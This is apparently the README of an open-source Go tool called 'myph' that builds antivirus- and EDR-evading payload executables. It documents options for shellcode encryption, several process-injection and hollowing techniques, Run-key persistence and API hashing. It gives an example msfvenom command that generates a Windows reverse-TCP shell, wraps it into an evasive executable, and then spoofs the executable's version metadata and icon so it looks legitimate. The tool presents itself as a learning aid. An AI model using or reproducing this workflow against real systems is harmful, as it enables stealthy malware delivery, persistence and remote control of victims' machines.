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AV/EDR bypass payload creation tool


The access to and the use of the information on this repository is free of charge, but implies the tacit acceptance by the user of the following conditions, without prejudice to the applicable legal provisions. The user acknowledges that this repository is intended for informational purposes only and therefore serves only for general information and testing. The tool and this repository are carefully compiled on the basis of good sources and references.

However, the developers cannot be held liable for for any damage, direct or indirect, of whatever nature as a result of or related to the access to or use of the software.

IOCs have voluntarily been added to the project. Don't open any issues regarding detections, it's pointless. The goal of this project is to learn & teach. If you want a FUD loader, dont be a baby and make your own.

How to use the software ?

Please note this project is under development & subject to changes. Breaking changes can be introduced from release to release.

Compiling or Installing the project

You can easily compile like so:

# if you have make installed
make  # you can also use `make help` to check recipes

# if you don't
go build -o myph .

You can also grab the latest release from here

Finally, you can install from the golang package repository like so:

# /!\ lowercase is important /!\
go install


Available Commands:
  completion  Generate the autocompletion script for the specified shell
  help        Help about any command
  spoof       spoof PE metadata using versioninfo

      --api-hashing-type string   Hashing algorithm used for API hashing (default "DJB2")
  -d, --debug                     builds binary with debug symbols
  -e, --encryption encKind        encryption method. (allowed: AES, chacha20, XOR, blowfish) (default AES)
  -h, --help                      help for myph
  -k, --key string                encryption key, auto-generated if empty. (if used by --encryption)
  -f, --out string                output name (default "payload.exe")
  -z, --persistence string        name of the binary being placed in '%APPDATA%' and in 'SOFTWARE\Microsoft\Windows\CurrentVersion\Run' reg key (default: "")
  -p, --process string            target process to inject shellcode to (default "cmd.exe")
  -s, --shellcode string          shellcode path (default "msf.raw")
      --sleep-time uint           sleep time in seconds before executing loader (default: 0)
  -t, --technique string          shellcode-loading technique (allowed: CRT, CRTx, CreateFiber, ProcessHollowing, CreateThread, NtCreateThreadEx, Syscall, SyscallTest, Etwp, SetTimer) (default "CRT")
      --use-api-hashing           Use API Hashing
  -v, --version                   version for myph

Loader Methods

This tool supports few methods for now, but aims to add more as time goes on:

  • Syscall
  • CreateFiber
  • CreateThread
  • NtCreateThreadEx
  • Process hollowing
  • EnumCalendarInfoA
  • CreateRemoteThread
  • EtwpCreateEtwThread
  • CreateRemoteThreadEx
  • SetTimer

If you don't know what that is about, go check out this repository :)~

Example run

Generate a payload like so:

# generate your payload
msfvenom -p windows/x64/shell_reverse_tcp LHOST= LPORT=1234 -f raw -o msf.raw

# run myph (--shellcode is not mandatory here because we use the default value)
./myph --shellcode msf.raw --out something.exe

# you should find your payload here
file ./something.exe

# add some program metada
./myph spoof --pe something.exe --file .github/test-data/example.json

Using docker

# using makefile
make docker

# going through dockerfile directly
docker build . -t myph:latest

Editing file properties

A subcommand is available to edit a PE file's properties & change its icon or file version (for instance). For more information on CLI usage, you can run:

# will give you a little help display
./myph spoof --help

# will edit demo.exe with the data specified in example.json
./myph spoof --pe demo.exe --file example.json

It expects a JSON file, containing the metadata you want to set. You can find an example in .github/test-data directory.

Information on resource types and language IDs can be found here and here.

You can set data depending on the language. BMP, ICO, and PNG files are supported, and you can a wide array of information:

    "#1": {
      "0000": {
        "fixed": {
          "file_version": "1.2",
          "product_version": "1.2.3",
          "flags": "Debug,Patched",
          "timestamp": "2020-12-18T23:00:00+01:00"
        "info": {
          "0409": {
            "Comments": "that should do it",
            "CompanyName": "Smersh",
            "FileDescription": "smrsh 4 evr",
            "FileVersion": "1.2",
            "InternalName": "",
            "LegalCopyright": "GNU GPL v3",
            "LegalTrademarks": "",
            "OriginalFilename": "myph.exe",
            "PrivateBuild": "",
            "ProductName": "myph ldr",
            "ProductVersion": "1.2 release",
            "SpecialBuild": ""
          "040C": {
            "Comments": "ca devrait le faire",
            "CompanyName": "Smersh",
            "FileDescription": "smrh pr tjrs",
            "FileVersion": "1.2",
            "InternalName": "",
            "LegalCopyright": "GNU GPL v3",
            "LegalTrademarks": "",
            "OriginalFilename": "myph.exe",
            "PrivateBuild": "",
            "ProductName": "myph ldr",
            "ProductVersion": "1.2 release",
            "SpecialBuild": ""


Contributions are welcome, but please try to keep PRs short and issues descriptive. :)~

A guide on how to use the tool is in the works, please let us know if you're interested in helping out.